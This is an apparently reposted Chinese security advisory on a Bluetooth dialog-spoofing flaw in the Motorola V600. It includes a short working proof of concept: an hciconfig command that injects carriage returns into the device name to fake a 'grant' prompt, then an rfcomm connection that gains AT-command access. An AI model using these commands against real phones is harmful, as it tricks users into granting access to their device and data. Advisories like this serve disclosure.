正文 - Motorola蓝牙接口存在对话框伪造漏洞

Motorola蓝牙接口存在对话框伪造漏洞
12/31 2008	黑客技术 \| 安全	485 次查看
上一条：美诞生黑客训练营研究黑客技术知己知彼下一条：黑客如何实现网络过载攻击深度解析
漏洞信息　　Motorola V600支持蓝牙功能。　　Motorola V600蓝牙接收存在对话框伪造问题，远程攻击者可以利用漏洞获得敏感信息。　　当接收到蓝牙通信时，攻击者可利用该问题诱使用户进入AT访问设备，可借此获得敏感信息。　　BUGTRAQ ID: 17190 　　CNCAN ID:CNCAN-2006032305 　　漏洞消息时间:2006-03-22 　　漏洞起因　　输入验证错误　　影响系统　　Motorola V600 　　危害　　远程攻击者可以利用漏洞获得敏感信息。　　攻击所需条件　　攻击者必须可以访问Motorola V600。　　测试方法　　# hciconfig hci0 name `perl -e 'print "Press\x0dgrant\x0dto\x0ddisable\x0dmute\x0d\x0d"'` 　　# rfcomm connect 0 00:15:A8:74:87:3E 3 (wait for user to press grant) 　　Connected /dev/rfcomm0 to 00:15:A8:74:87:3E on channel 3 　　Press CTRL-C for hangup 　　厂商解决方案　　联系供应商获得补丁方案：　　http://www.motorola.com/motoinfo/product/details/0,,11,00.html 　　漏洞提供者　　Kevin Finisterre 　　漏洞消息链接　　http://marc.theaimsgroup.com/?l=bugtraq&m=114304846013066&w=2 　　漏洞消息标题　　DMA[2006-0321a] - 'Motorola P2K Platform setpath() overflow and Blueline